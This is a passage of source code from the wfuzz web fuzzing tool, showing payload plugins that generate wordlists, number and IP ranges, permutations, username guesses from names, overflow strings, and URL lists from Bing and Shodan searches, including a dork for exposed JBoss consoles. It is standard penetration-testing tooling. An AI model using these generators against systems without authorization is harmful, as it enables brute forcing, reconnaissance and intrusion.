72 | @moduleman_plugin
73 | class chain(BaseIterator):
74 | name = "chain"
75 | author = ("Xavi Mendez (@xmendez)",)
76 | version = "0.1"
77 | summary = "Returns an iterator returns elements from the first iterable until it is exhausted, then proceeds to the next iterable, until all of the iterables are exhausted."
78 | category = ["default"]
79 | priority = 99
80 |
81 | def __init__(self, *i):
82 | self._payload_list = i
83 | self.__count = sum([x.count() for x in i])
84 | self.it = itertools.chain(*i)
85 |
86 | def count(self):
87 | return self.__count
88 |
89 | def width(self):
90 | return 1
91 |
92 | def payloads(self):
93 | return self._payload_list
94 |
95 | def __next__(self):
96 | return (next(self.it),)
97 |
98 | def __iter__(self):
99 | return self
100 |
--------------------------------------------------------------------------------
/src/wfuzz/plugins/payloads/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xmendez/wfuzz/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/src/wfuzz/plugins/payloads/__init__.py
--------------------------------------------------------------------------------
/src/wfuzz/plugins/payloads/autorize.py:
--------------------------------------------------------------------------------
1 | import re
2 | import base64
3 |
4 | from wfuzz.exception import FuzzExceptBadFile
5 | from wfuzz.fuzzobjects import FuzzResult, FuzzWordType
6 | from wfuzz.fuzzrequest import FuzzRequest
7 | from wfuzz.plugin_api.base import BasePayload
8 | from wfuzz.externals.moduleman.plugin import moduleman_plugin
9 | from wfuzz.helpers.obj_dyn import rgetattr
10 |
11 |
12 | @moduleman_plugin
13 | class autorize(BasePayload):
14 | name = "autorize"
15 | author = ("Xavi Mendez (@xmendez)",)
16 | version = "0.2"
17 | description = ("Reads burp extension autorize states",)
18 | summary = "Returns fuzz results' from autorize."
19 | category = ["default"]
20 | priority = 99
21 |
22 | parameters = (
23 | ("fn", "", True, "Filename of a valid autorize state file."),
24 | (
25 | "attr",
26 | None,
27 | False,
28 | "Attribute of fuzzresult to return. If not specified the whole object is returned.",
29 | ),
30 | )
31 |
32 | default_parameter = "fn"
33 |
34 | def __init__(self, params):
35 | BasePayload.__init__(self, params)
36 |
37 | self.__max = -1
38 | self.attr = self.params["attr"]
39 | self._it = self._gen_wfuzz(self.params["fn"])
40 |
41 | def count(self):
42 | return self.__max
43 |
44 | def get_next(self):
45 | next_item = next(self._it)
46 |
47 | return next_item if not self.attr else rgetattr(next_item, self.attr)
48 |
49 | def get_type(self):
50 | return FuzzWordType.WORD
51 |
52 | def _gen_wfuzz(self, output_fn):
53 | try:
54 |
55 | with open(self.find_file(output_fn), "r") as f:
56 | for (
57 | url1,
58 | port1,
59 | schema1,
60 | req1,
61 | resp1,
62 | url2,
63 | port2,
64 | schema2,
65 | req2,
66 | resp2,
67 | url3,
68 | port3,
69 | schema3,
70 | req3,
71 | resp3,
72 | res1,
73 | res2,
74 | ) in [re.split(r"\t+", x) for x in f.readlines()]:
75 | raw_req1 = base64.decodestring(req2)
76 | # raw_res1 = base64.decodestring(res2)
77 |
78 | item = FuzzResult()
79 | item.history = FuzzRequest()
80 | item.history.update_from_raw_http(raw_req1, schema1)
81 |
82 | yield item
83 | except IOError as e:
84 | raise FuzzExceptBadFile("Error opening wfuzz payload file. %s" % str(e))
85 | except EOFError:
86 | raise StopIteration
87 |
--------------------------------------------------------------------------------
/src/wfuzz/plugins/payloads/bing.py:
--------------------------------------------------------------------------------
1 | from wfuzz.externals.moduleman.plugin import moduleman_plugin
2 | from wfuzz.plugin_api.payloadtools import BingIter
3 | from wfuzz.plugin_api.base import BasePayload
4 | from wfuzz.fuzzobjects import FuzzWordType
5 |
6 |
7 | @moduleman_plugin
8 | class bing(BasePayload):
9 | name = "bing"
10 | author = ("Xavi Mendez (@xmendez)",)
11 | version = "0.2"
12 | description = (
13 | 'intitle:"JBoss JMX Management Console"',
14 | "Some examples of bing hacking:",
15 | "http://www.elladodelmal.com/2010/02/un-poco-de-bing-hacking-i-de-iii.html",
16 | )
17 |
18 | summary = "Returns URL results of a given bing API search (needs api key)."
19 | category = ["default"]
20 | priority = 99
21 |
22 | parameters = (
23 | ("dork", "", True, "Google dork search string."),
24 | ("offset", "0", False, "Offset index, starting at zero."),
25 | ("limit", "0", False, "Number of results. Zero for all."),
26 | )
27 |
28 | default_parameter = "dork"
29 |
30 | def __init__(self, params):
31 | BasePayload.__init__(self, params)
32 |
33 | offset = int(params["offset"])
34 | limit = int(params["limit"])
35 |
36 | self._it = BingIter(params["dork"], offset, limit)
37 |
38 | def count(self):
39 | return self._it.max_count
40 |
41 | def get_next(self):
42 | return next(self._it)
43 |
44 | def get_type(self):
45 | return FuzzWordType.WORD
46 |
--------------------------------------------------------------------------------
/src/wfuzz/plugins/payloads/buffer_overflow.py:
--------------------------------------------------------------------------------
1 | from wfuzz.externals.moduleman.plugin import moduleman_plugin
2 | from wfuzz.plugin_api.base import BasePayload
3 | from wfuzz.fuzzobjects import FuzzWordType
4 |
5 |
6 | @moduleman_plugin
7 | class buffer_overflow(BasePayload):
8 | name = "buffer_overflow"
9 | author = ("Xavi Mendez (@xmendez)",)
10 | version = "0.2"
11 | description = ()
12 | summary = "Returns a string using the following pattern A * given number."
13 | category = ["default"]
14 | priority = 99
15 |
16 | parameters = (("size", "", True, "Size of the overflow string."),)
17 |
18 | default_parameter = "size"
19 |
20 | def __init__(self, params):
21 | BasePayload.__init__(self, params)
22 |
23 | self.bov_list = ["A" * int(self.params["size"])]
24 | self.current = 0
25 |
26 | def count(self):
27 | return 1
28 |
29 | def get_next(self):
30 | if self.current == 0:
31 | elem = self.bov_list[self.current]
32 | self.current += 1
33 | return elem
34 | else:
35 | raise StopIteration
36 |
37 | def get_type(self):
38 | return FuzzWordType.WORD
39 |
--------------------------------------------------------------------------------
/src/wfuzz/plugins/payloads/burpitem.py:
--------------------------------------------------------------------------------
1 | from wfuzz.externals.moduleman.plugin import moduleman_plugin
2 | from wfuzz.exception import FuzzExceptBadFile
3 | from wfuzz.fuzzobjects import FuzzResult, FuzzWordType
4 | from wfuzz.fuzzrequest import FuzzRequest
5 | from wfuzz.plugin_api.base import BasePayload
6 | from wfuzz.helpers.obj_dyn import rgetattr
7 | import xml.etree.cElementTree as ET
8 | from base64 import b64decode
9 |
10 |
11 | @moduleman_plugin
12 | class burpitem(BasePayload):
13 | name = "burpitem"
14 | author = ("Bendegúz Nagy (@PaperTsar)",)
15 | version = "0.1"
16 | description = (
17 | "This payload loads request/response from items saved from Burpsuite.",
18 | )
19 | summary = "This payload loads request/response from items saved from Burpsuite."
20 | category = ["default"]
21 | priority = 99
22 |
23 | parameters = (
24 | ("fn", "", True, "Filename of a valid Burp item file."),
25 | (
26 | "attr",
27 | None,
28 | False,
29 | "Attribute of fuzzresult to return. If not specified the whole object is returned.",
30 | ),
31 | )
32 |
33 | default_parameter = "fn"
34 |
35 | def __init__(self, params):
36 | BasePayload.__init__(self, params)
37 |
38 | self.__max = -1
39 | self.attr = self.params["attr"]
40 | self._it = self._gen_burpitem(self.params["fn"])
41 |
42 | def count(self):
43 | return self.__max
44 |
45 | def get_next(self):
46 | next_item = next(self._it)
47 |
48 | return next_item if not self.attr else rgetattr(next_item, self.attr)
49 |
50 | def get_type(self):
51 | return FuzzWordType.FUZZRES if not self.attr else FuzzWordType.WORD
52 |
53 | def _gen_burpitem(self, output_fn):
54 | try:
55 | tree = ET.parse(self.find_file(output_fn))
56 | for item in tree.getroot().iter("item"):
57 | fr = FuzzRequest()
58 | fr.update_from_raw_http(
59 | raw=b64decode(item.find("request").text or "").decode("utf-8"),
60 | scheme=item.find("protocol").text,
61 | raw_response=b64decode(item.find("response").text or ""),
62 | )
63 | fr.wf_ip = {
64 | "ip": item.find("host").attrib.get("ip", None)
65 | or item.find("host").text,
66 | "port": item.find("port").text,
67 | }
68 | frr = FuzzResult(history=fr)
69 |
70 | yield frr.update()
71 | return
72 | except IOError as e:
73 | raise FuzzExceptBadFile(
74 | "Error opening Burp items payload file. %s" % str(e)
75 | )
76 | except EOFError:
77 | return
78 |
--------------------------------------------------------------------------------
/src/wfuzz/plugins/payloads/dirwalk.py:
--------------------------------------------------------------------------------
1 | from wfuzz.externals.moduleman.plugin import moduleman_plugin
2 | from wfuzz.plugin_api.base import BasePayload
3 | from wfuzz.fuzzobjects import FuzzWordType
4 |
5 | import os
6 |
7 | # Python 2 and 3: alternative 4
8 | try:
9 | from urllib.parse import quote
10 | except ImportError:
11 | from urllib import quote
12 |
13 |
14 | @moduleman_plugin
15 | class dirwalk(BasePayload):
16 | name = "dirwalk"
17 | author = ("Xavi Mendez (@xmendez)",)
18 | version = "0.1"
19 | description = (
20 | "Returns all the file paths found in the specified directory.",
21 | "Handy if you want to check a directory structure against a webserver,",
22 | "for example, because you have previously downloaded a specific version",
23 | "of what is supposed to be on-line.",
24 | )
25 | summary = "Returns filename's recursively from a local directory."
26 | category = ["default"]
27 | priority = 99
28 |
29 | parameters = (
30 | ("dir", "", True, "Directory path to walk and generate payload from."),
31 | )
32 |
33 | default_parameter = "dir"
34 |
35 | def __init__(self, params):
36 | BasePayload.__init__(self, params)
37 |
38 | self.g = self._my_gen(self.params["dir"])
39 |
40 | def _my_gen(self, directory):
41 | for root, dirs, fnames in os.walk(directory):
42 | for f in fnames:
43 | relative_path = os.path.relpath(os.path.join(root, f), directory)
44 | yield quote(relative_path)
45 |
46 | def get_next(self):
47 | return next(self.g)
48 |
49 | def get_type(self):
50 | return FuzzWordType.WORD
51 |
52 | def count(self):
53 | return -1
54 |
--------------------------------------------------------------------------------
/src/wfuzz/plugins/payloads/file.py:
--------------------------------------------------------------------------------
1 | from wfuzz.externals.moduleman.plugin import moduleman_plugin
2 | from wfuzz.exception import FuzzExceptBadFile
3 | from wfuzz.plugin_api.base import BasePayload
4 | from wfuzz.helpers.file_func import FileDetOpener
5 | from wfuzz.fuzzobjects import FuzzWordType
6 |
7 |
8 | @moduleman_plugin
9 | class file(BasePayload):
10 | name = "file"
11 | author = (
12 | "Carlos del Ojo",
13 | "Christian Martorella",
14 | "Adapted to newer versions Xavi Mendez (@xmendez)",
15 | )
16 | version = "0.2"
17 | description = ("Returns the contents of a dictionary file line by line.",)
18 | summary = "Returns each word from a file."
19 | category = ["default"]
20 | priority = 99
21 |
22 | parameters = (
23 | ("fn", "", True, "Filename of a valid dictionary"),
24 | (
25 | "count",
26 | "True",
27 | False,
28 | "Indicates if the number of words in the file should be counted.",
29 | ),
30 | ("encoding", "Auto", False, "Indicates the file encoding."),
31 | )
32 |
33 | default_parameter = "fn"
34 |
35 | def __init__(self, params):
36 | BasePayload.__init__(self, params)
37 |
38 | try:
39 | encoding = (
40 | self.params["encoding"]
41 | if self.params["encoding"].lower() != "auto"
42 | else None
43 | )
44 | self.f = FileDetOpener(self.find_file(self.params["fn"]), encoding)
45 | except IOError as e:
46 | raise FuzzExceptBadFile("Error opening file. %s" % str(e))
47 |
48 | self.__count = None
49 |
50 | def get_type(self):
51 | return FuzzWordType.WORD
52 |
53 | def get_next(self):
54 | line = next(self.f)
55 | if not line:
56 | self.f.close()
57 | raise StopIteration
58 | return line.strip()
59 |
60 | def count(self):
61 | if self.params["count"].lower() == "false":
62 | return -1
63 |
64 | if self.__count is None:
65 | self.__count = len(list(self.f))
66 | self.f.reset()
67 |
68 | return self.__count
69 |
--------------------------------------------------------------------------------
/src/wfuzz/plugins/payloads/guitab.py:
--------------------------------------------------------------------------------
1 | from wfuzz.externals.moduleman.plugin import moduleman_plugin
2 | from wfuzz.plugin_api.base import BasePayload
3 | from wfuzz.fuzzobjects import FuzzWordType
4 |
5 | from wfuzz.facade import Facade
6 |
7 |
8 | @moduleman_plugin
9 | class guitab(BasePayload):
10 | name = "guitab"
11 | author = ("Xavi Mendez (@xmendez)",)
12 | version = "0.1"
13 | description = (
14 | "** This is a beta plugin for the GUI under construction.",
15 | "This payload reads requests from a tab in the GUI",
16 | )
17 | summary = "This payload reads requests from a tab in the GUI"
18 | category = ["default"]
19 | priority = 99
20 |
21 | parameters = (
22 | ("tab", "", True, "Name of a valid GUI tab."),
23 | (
24 | "attr",
25 | None,
26 | False,
27 | "Attribute of fuzzresult to return. If not specified the whole object is returned.",
28 | ),
29 | )
30 |
31 | default_parameter = "tab"
32 |
33 | def __init__(self, params):
34 | BasePayload.__init__(self, params)
35 |
36 | self.attr = self.params["attr"]
37 | self._it = iter(Facade().data[self.params["tab"]])
38 |
39 | def count(self):
40 | return len(Facade().data[self.params["tab"]])
41 |
42 | def get_type(self):
43 | return FuzzWordType.WORD
44 |
45 | def get_next(self):
46 | next_item = next(self._it)
47 |
48 | return next_item if not self.attr else next_item.get_field(self.attr)
49 |
--------------------------------------------------------------------------------
/src/wfuzz/plugins/payloads/hexrand.py:
--------------------------------------------------------------------------------
1 | from wfuzz.externals.moduleman.plugin import moduleman_plugin
2 | from wfuzz.plugin_api.base import BasePayload
3 | from wfuzz.exception import FuzzExceptPluginBadParams
4 | from wfuzz.fuzzobjects import FuzzWordType
5 |
6 | import random
7 |
8 |
9 | @moduleman_plugin
10 | class hexrand(BasePayload):
11 | name = "hexrand"
12 | author = (
13 | "Carlos del Ojo",
14 | "Christian Martorella",
15 | "Adapted to newer versions Xavi Mendez (@xmendez)",
16 | )
17 | version = "0.1"
18 | description = ()
19 | summary = "Returns random hex numbers from the given range."
20 | category = ["default"]
21 | priority = 99
22 |
23 | parameters = (
24 | (
25 | "range",
26 | "",
27 | True,
28 | "Range of hex numbers to randomly generate in the form of 00-ff.",
29 | ),
30 | )
31 |
32 | default_parameter = "range"
33 |
34 | def __init__(self, params):
35 | BasePayload.__init__(self, params)
36 |
37 | try:
38 | ran = self.params["range"].split("-")
39 | self.minimum = int(ran[0], 16)
40 | self.maximum = int(ran[1], 16)
41 | self.__count = -1
42 | except ValueError:
43 | raise FuzzExceptPluginBadParams('Bad range format (eg. "0-ffa")')
44 |
45 | def __iter__(self):
46 | return self
47 |
48 | def count(self):
49 | return self.__count
50 |
51 | def get_type(self):
52 | return FuzzWordType.WORD
53 |
54 | def get_next(self):
55 | self.current = random.SystemRandom().randint(self.minimum, self.maximum)
56 |
57 | lgth = len(hex(self.maximum).replace("0x", ""))
58 | pl = "%" + str(lgth) + "s"
59 | num = hex(self.current).replace("0x", "")
60 | pl = pl % (num)
61 | payl = pl.replace(" ", "0")
62 |
63 | return payl
64 |
--------------------------------------------------------------------------------
/src/wfuzz/plugins/payloads/hexrange.py:
--------------------------------------------------------------------------------
1 | from wfuzz.externals.moduleman.plugin import moduleman_plugin
2 | from wfuzz.plugin_api.base import BasePayload
3 | from wfuzz.exception import FuzzExceptBadOptions
4 | from wfuzz.fuzzobjects import FuzzWordType
5 |
6 |
7 | @moduleman_plugin
8 | class hexrange(BasePayload):
9 | name = "hexrange"
10 | author = (
11 | "Carlos del Ojo",
12 | "Christian Martorella",
13 | "Adapted to newer versions Xavi Mendez (@xmendez)",
14 | )
15 | version = "0.1"
16 | description = ()
17 | summary = "Returns each hex number of the given hex range."
18 | category = ["default"]
19 | priority = 99
20 |
21 | parameters = (
22 | ("range", "", True, "Range of hex numbers to generate in the form of 00-ff."),
23 | )
24 |
25 | default_parameter = "range"
26 |
27 | def __init__(self, params):
28 | BasePayload.__init__(self, params)
29 |
30 | try:
31 | ran = self.params["range"].split("-")
32 | self.minimum = int(ran[0], 16)
33 | self.maximum = int(ran[1], 16)
34 | self.__count = self.maximum - self.minimum + 1
35 | self.current = self.minimum
36 | self.lgth = max(
37 | len(ran[0]), len(ran[1]), len(hex(self.maximum).replace("0x", ""))
38 | )
39 | except ValueError:
40 | raise FuzzExceptBadOptions('Bad range format (eg. "0-ffa")')
41 |
42 | def count(self):
43 | return self.__count
44 |
45 | def get_type(self):
46 | return FuzzWordType.WORD
47 |
48 | def get_next(self):
49 | if self.current > self.maximum:
50 | raise StopIteration
51 |
52 | pl = "%" + str(self.lgth) + "s"
53 | num = hex(self.current).replace("0x", "")
54 | pl = pl % (num)
55 | payl = pl.replace(" ", "0")
56 |
57 | self.current += 1
58 |
59 | return payl
60 |
--------------------------------------------------------------------------------
/src/wfuzz/plugins/payloads/ipnet.py:
--------------------------------------------------------------------------------
1 | from wfuzz.externals.moduleman.plugin import moduleman_plugin
2 | from wfuzz.exception import FuzzExceptPluginBadParams, FuzzExceptBadInstall
3 | from wfuzz.plugin_api.base import BasePayload
4 | from wfuzz.fuzzobjects import FuzzWordType
5 |
6 |
7 | @moduleman_plugin
8 | class ipnet(BasePayload):
9 | name = "ipnet"
10 | author = ("Xavi Mendez (@xmendez)",)
11 | version = "0.1"
12 | description = ("ie. 192.168.1.0/24", "Requires: netaddr module")
13 | summary = "Returns list of IP addresses of a network."
14 | category = ["default"]
15 | priority = 99
16 |
17 | parameters = (("net", "", True, "Network range in the form ip/mask."),)
18 |
19 | default_parameter = "net"
20 |
21 | def __init__(self, params):
22 | BasePayload.__init__(self, params)
23 |
24 | try:
25 | from netaddr import IPNetwork
26 | from netaddr.core import AddrFormatError
27 |
28 | net = IPNetwork("%s" % self.params["net"])
29 | self.f = net.iter_hosts()
30 | self.__count = net.size - 2
31 |
32 | if self.__count <= 0:
33 | raise FuzzExceptPluginBadParams(
34 | "There are not hosts in the specified network"
35 | )
36 |
37 | except ValueError:
38 | raise FuzzExceptPluginBadParams(
39 | "The specified network has an incorrect format."
40 | )
41 | except ImportError:
42 | raise FuzzExceptBadInstall(
43 | "ipnet plugin requires netaddr module. Please install it using pip."
44 | )
45 | except AddrFormatError:
46 | raise FuzzExceptPluginBadParams(
47 | "The specified network has an incorrect format."
48 | )
49 |
50 | def get_type(self):
51 | return FuzzWordType.WORD
52 |
53 | def get_next(self):
54 | return str(next(self.f))
55 |
56 | def count(self):
57 | return self.__count
58 |
--------------------------------------------------------------------------------
/src/wfuzz/plugins/payloads/iprange.py:
--------------------------------------------------------------------------------
1 | from wfuzz.externals.moduleman.plugin import moduleman_plugin
2 | from wfuzz.exception import FuzzExceptPluginBadParams, FuzzExceptBadInstall
3 | from wfuzz.plugin_api.base import BasePayload
4 | from wfuzz.fuzzobjects import FuzzWordType
5 |
6 |
7 | @moduleman_plugin
8 | class iprange(BasePayload):
9 | name = "iprange"
10 | author = ("Xavi Mendez (@xmendez)",)
11 | version = "0.1"
12 | description = (
13 | "ie. 192.168.1.0-192.168.1.12",
14 | "Requires: netaddr module",
15 | )
16 | summary = "Returns list of IP addresses of a given IP range."
17 | category = ["default"]
18 | priority = 99
19 |
20 | parameters = (
21 | ("iprange", "", True, "IP address range int the form 192.168.1.0-192.168.1.12"),
22 | )
23 |
24 | default_parameter = "iprange"
25 |
26 | def __init__(self, params):
27 | BasePayload.__init__(self, params)
28 |
29 | try:
30 | from netaddr import IPRange
31 | from netaddr.core import AddrFormatError
32 |
33 | ran = self.params["iprange"].split("-")
34 | net = IPRange(ran[0], ran[1])
35 | self.f = iter(net)
36 | self.__count = net.size
37 | except ImportError:
38 | raise FuzzExceptBadInstall(
39 | "ipnet plugin requires netaddr module. Please install it using pip."
40 | )
41 | except AddrFormatError:
42 | raise FuzzExceptPluginBadParams(
43 | "The specified network range has an incorrect format."
44 | )
45 | except IndexError:
46 | raise FuzzExceptPluginBadParams(
47 | "The specified network range has an incorrect format."
48 | )
49 |
50 | def get_type(self):
51 | return FuzzWordType.WORD
52 |
53 | def get_next(self):
54 | return str(next(self.f))
55 |
56 | def count(self):
57 | return self.__count
58 |
--------------------------------------------------------------------------------
/src/wfuzz/plugins/payloads/list.py:
--------------------------------------------------------------------------------
1 | from wfuzz.externals.moduleman.plugin import moduleman_plugin
2 | from wfuzz.plugin_api.base import BasePayload
3 | from wfuzz.fuzzobjects import FuzzWordType
4 |
5 |
6 | @moduleman_plugin
7 | class list(BasePayload):
8 | name = "list"
9 | author = ("Xavi Mendez (@xmendez)",)
10 | version = "0.1"
11 | description = ("ie word1-word2",)
12 | summary = "Returns each element of the given word list separated by -."
13 | category = ["default"]
14 | priority = 99
15 |
16 | parameters = (
17 | ("values", "", True, "Values separated by - to return as a dictionary."),
18 | )
19 |
20 | default_parameter = "values"
21 |
22 | def __init__(self, params):
23 | BasePayload.__init__(self, params)
24 |
25 | if self.params["values"].find("\\") >= 0:
26 | self.params["values"] = self.params["values"].replace("\\-", "$SEP$")
27 | self.params["values"] = self.params["values"].replace("\\\\", "$SCAP$")
28 |
29 | self.value_list = self.params["values"].split("-")
30 |
31 | for i in range(len(self.value_list)):
32 | self.value_list[i] = self.value_list[i].replace("$SEP$", "-")
33 | self.value_list[i] = self.value_list[i].replace("$SCAP$", "\\")
34 | else:
35 | self.value_list = self.params["values"].split("-")
36 |
37 | self.__count = len(self.value_list)
38 | self.current = 0
39 |
40 | def count(self):
41 | return self.__count
42 |
43 | def get_type(self):
44 | return FuzzWordType.WORD
45 |
46 | def get_next(self):
47 | if self.current >= self.__count:
48 | raise StopIteration
49 | else:
50 | elem = self.value_list[self.current]
51 | self.current += 1
52 | return elem
53 |
--------------------------------------------------------------------------------
/src/wfuzz/plugins/payloads/names.py:
--------------------------------------------------------------------------------
1 | from wfuzz.externals.moduleman.plugin import moduleman_plugin
2 | from wfuzz.plugin_api.base import BasePayload
3 | from wfuzz.fuzzobjects import FuzzWordType
4 |
5 |
6 | @moduleman_plugin
7 | class names(BasePayload):
8 | name = "names"
9 | author = (
10 | "Christian Martorella",
11 | "Adapted to newer versions Xavi Mendez (@xmendez)",
12 | )
13 | version = "0.1"
14 | description = ("ie. jon-smith",)
15 | summary = "Returns possible usernames by mixing the given words, separated by -, using known typical constructions."
16 | category = ["default"]
17 | priority = 99
18 |
19 | parameters = (("name", "", True, "Name and surname in the form of name-surname."),)
20 |
21 | default_parameter = "name"
22 |
23 | def __init__(self, params):
24 | BasePayload.__init__(self, params)
25 |
26 | possibleusernames = []
27 | name = ""
28 | llist = self.params["name"].split("-")
29 |
30 | for x in llist:
31 | if name == "":
32 | name = name + x
33 | else:
34 | name = name + " " + x
35 |
36 | if " " in name:
37 | parts = name.split()
38 | possibleusernames.append(parts[0])
39 | possibleusernames.append(parts[0] + "." + parts[1])
40 | possibleusernames.append(parts[0] + parts[1])
41 | possibleusernames.append(parts[0] + "." + parts[1][0])
42 | possibleusernames.append(parts[0][0] + "." + parts[1])
43 | possibleusernames.append(parts[0] + parts[1][0])
44 | possibleusernames.append(parts[0][0] + parts[1])
45 | str1 = ""
46 | str2 = ""
47 | str3 = ""
48 | str4 = ""
49 | for i in range(0, len(parts) - 1):
50 | str1 = str1 + parts[i] + "."
51 | str2 = str2 + parts[i]
52 | str3 = str3 + parts[i][0] + "."
53 | str4 = str4 + parts[i][0]
54 | str5 = str1 + parts[-1]
55 | str6 = str2 + parts[-1]
56 | str7 = str4 + parts[-1]
57 | str8 = str3 + parts[-1]
58 | str9 = str2 + parts[-1][0]
59 | str10 = str4 + parts[-1][0]
60 | possibleusernames.append(str5)
61 | possibleusernames.append(str6)
62 | possibleusernames.append(str7)
63 | possibleusernames.append(str8)
64 | possibleusernames.append(str9)
65 | possibleusernames.append(str10)
66 | possibleusernames.append(parts[-1])
67 | possibleusernames.append(parts[0] + "." + parts[-1])
68 | possibleusernames.append(parts[0] + parts[-1])
69 | possibleusernames.append(parts[0] + "." + parts[-1][0])
70 | possibleusernames.append(parts[0][0] + "." + parts[-1])
71 | possibleusernames.append(parts[0] + parts[-1][0])
72 | possibleusernames.append(parts[0][0] + parts[-1])
73 | else:
74 | possibleusernames.append(name)
75 |
76 | self.creatednames = possibleusernames
77 | self.__count = len(possibleusernames)
78 |
79 | def count(self):
80 | return self.__count
81 |
82 | def get_type(self):
83 | return FuzzWordType.WORD
84 |
85 | def get_next(self):
86 | if self.creatednames:
87 | payl = self.creatednames.pop()
88 | return payl
89 | else:
90 | raise StopIteration
91 |
--------------------------------------------------------------------------------
/src/wfuzz/plugins/payloads/permutation.py:
--------------------------------------------------------------------------------
1 | from wfuzz.externals.moduleman.plugin import moduleman_plugin
2 | from wfuzz.plugin_api.base import BasePayload
3 | from wfuzz.exception import FuzzExceptBadOptions
4 | from wfuzz.fuzzobjects import FuzzWordType
5 |
6 |
7 | @moduleman_plugin
8 | class permutation(BasePayload):
9 | name = "permutation"
10 | author = ("Xavi Mendez (@xmendez)",)
11 | version = "0.1"
12 | description = ()
13 | summary = "Returns permutations of the given charset and length."
14 | category = ["default"]
15 | priority = 99
16 |
17 | parameters = (("ch", "", True, "Charset and len to permute in the form of abc-2."),)
18 |
19 | default_parameter = "ch"
20 |
21 | def __init__(self, params):
22 | BasePayload.__init__(self, params)
23 | self.charset = []
24 |
25 | try:
26 | ran = self.params["ch"].split("-")
27 | self.charset = ran[0]
28 | self.width = int(ran[1])
29 | except ValueError:
30 | raise FuzzExceptBadOptions('Bad range format (eg. "0-ffa")')
31 |
32 | pset = []
33 | for x in self.charset:
34 | pset.append(x)
35 |
36 | words = self.xcombinations(pset, self.width)
37 | self.lista = []
38 | for x in words:
39 | self.lista.append("".join(x))
40 |
41 | self.__count = len(self.lista)
42 |
43 | def count(self):
44 | return self.__count
45 |
46 | def get_type(self):
47 | return FuzzWordType.WORD
48 |
49 | def get_next(self):
50 | if self.lista != []:
51 | payl = self.lista.pop()
52 | return payl
53 | else:
54 | raise StopIteration
55 |
56 | def xcombinations(self, items, n):
57 | if n == 0:
58 | yield []
59 | else:
60 | for i in range(len(items)):
61 | for cc in self.xcombinations(items[:i] + items[i:], n - 1):
62 | yield [items[i]] + cc
63 |
--------------------------------------------------------------------------------
/src/wfuzz/plugins/payloads/range.py:
--------------------------------------------------------------------------------
1 | from wfuzz.externals.moduleman.plugin import moduleman_plugin
2 | from wfuzz.exception import FuzzExceptPluginBadParams
3 | from wfuzz.plugin_api.base import BasePayload
4 | from wfuzz.fuzzobjects import FuzzWordType
5 |
6 |
7 | @moduleman_plugin
8 | class range(BasePayload):
9 | name = "range"
10 | author = (
11 | "Carlos del Ojo",
12 | "Christian Martorella",
13 | "Adapted to newer versions Xavi Mendez (@xmendez)",
14 | )
15 | version = "0.1"
16 | description = ("ie. 0-10",)
17 | summary = "Returns each number of the given range."
18 | category = ["default"]
19 | priority = 99
20 |
21 | parameters = (("range", "", True, "Range of numbers in the form 0-10."),)
22 |
23 | default_parameter = "range"
24 |
25 | def __init__(self, params):
26 | BasePayload.__init__(self, params)
27 |
28 | try:
29 | ran = self.params["range"].split("-")
30 | self.minimum = int(ran[0])
31 | self.maximum = int(ran[1])
32 | self.__count = self.maximum - self.minimum + 1
33 | self.width = len(ran[0])
34 | self.current = self.minimum
35 | except ValueError:
36 | raise FuzzExceptPluginBadParams('Bad range format (eg. "23-56")')
37 |
38 | def get_type(self):
39 | return FuzzWordType.WORD
40 |
41 | def get_next(self):
42 | if self.current > self.maximum:
43 | raise StopIteration
44 | else:
45 | if self.width:
46 | payl = "%0" + str(self.width) + "d"
47 | payl = payl % (self.current)
48 | else:
49 | payl = str(self.current)
50 |
51 | self.current += 1
52 | return payl
53 |
54 | def count(self):
55 | return self.__count
56 |
57 | def __iter__(self):
58 | return self
59 |
--------------------------------------------------------------------------------
/src/wfuzz/plugins/payloads/shodanp.py:
--------------------------------------------------------------------------------
1 | from wfuzz.externals.moduleman.plugin import moduleman_plugin
2 | from wfuzz.plugin_api.payloadtools import ShodanIter
3 | from wfuzz.plugin_api.base import BasePayload
4 | from wfuzz.fuzzobjects import FuzzWordType
5 |
6 |
7 | @moduleman_plugin
8 | class shodanp(BasePayload):
9 | name = "shodanp"
10 | author = ("Xavi Mendez (@xmendez)",)
11 | version = "0.1"
12 | description = ("Queries the Shodan API",)
13 |
14 | summary = "Returns URLs of a given Shodan API search (needs api key)."
15 | category = ["default"]
16 | priority = 99
17 |
18 | parameters = (
19 | ("search", "", True, "Shodan search string."),
20 | ("page", "0", False, "Offset page, starting at zero."),
21 | (
22 | "limit",
23 | "0",
24 | False,
25 | "Number of pages (1 query credit = 100 results). Zero for all.",
26 | ),
27 | )
28 |
29 | default_parameter = "search"
30 |
31 | def __init__(self, params):
32 | BasePayload.__init__(self, params)
33 |
34 | search = params["search"]
35 | page = int(params["page"])
36 | limit = int(params["limit"])
37 |
38 | self._it = ShodanIter(search, page, limit)
39 |
40 | def count(self):
41 | return -1
42 |
43 | def close(self):
44 | self._it._stop()
45 |
46 | def get_type(self):
47 | return FuzzWordType.WORD
48 |
49 | def get_next(self):
50 | match = next(self._it)
51 |
52 | port = match["port"]
53 | scheme = "https" if "ssl" in match or port == 443 else "http"
54 |
55 | if match["hostnames"]:
56 | for hostname in match["hostnames"]:
57 | return "{}://{}:{}".format(scheme, hostname, port)
58 | else:
59 | return "{}://{}:{}".format(scheme, match["ip_str"], port)
60 |
--------------------------------------------------------------------------------
/src/wfuzz/plugins/payloads/stdin.py:
--------------------------------------------------------------------------------
1 | from wfuzz.externals.moduleman.plugin import moduleman_plugin
2 | from wfuzz.plugin_api.base import BasePayload
3 | from wfuzz.fuzzobjects import FuzzWordType
4 |
5 | import sys
6 |
7 |
8 | @moduleman_plugin
9 | class stdin(BasePayload):
10 | name = "stdin"
11 | author = ("Xavi Mendez (@xmendez)",)
12 | version = "0.1"
13 | description = ()
14 | summary = "Returns each item read from stdin."
15 | category = ["default"]
16 | priority = 99
17 |
18 | parameters = ()
19 |
20 | default_parameter = ""
21 |
22 | def __init__(self, params):
23 | BasePayload.__init__(self, params)
24 | self.__count = -1
25 |
26 | def count(self):
27 | return self.__count
28 |
29 | def get_type(self):
30 | return FuzzWordType.WORD
31 |
32 | def get_next(self):
33 | line = next(sys.stdin).strip()
34 |
35 | return line
36 |
--------------------------------------------------------------------------------
/src/wfuzz/plugins/payloads/wfuzzp.py:
--------------------------------------------------------------------------------
1 | import pickle as pickle
2 | import gzip
3 |
4 | from wfuzz.externals.moduleman.plugin import moduleman_plugin
5 | from wfuzz.exception import FuzzExceptBadFile
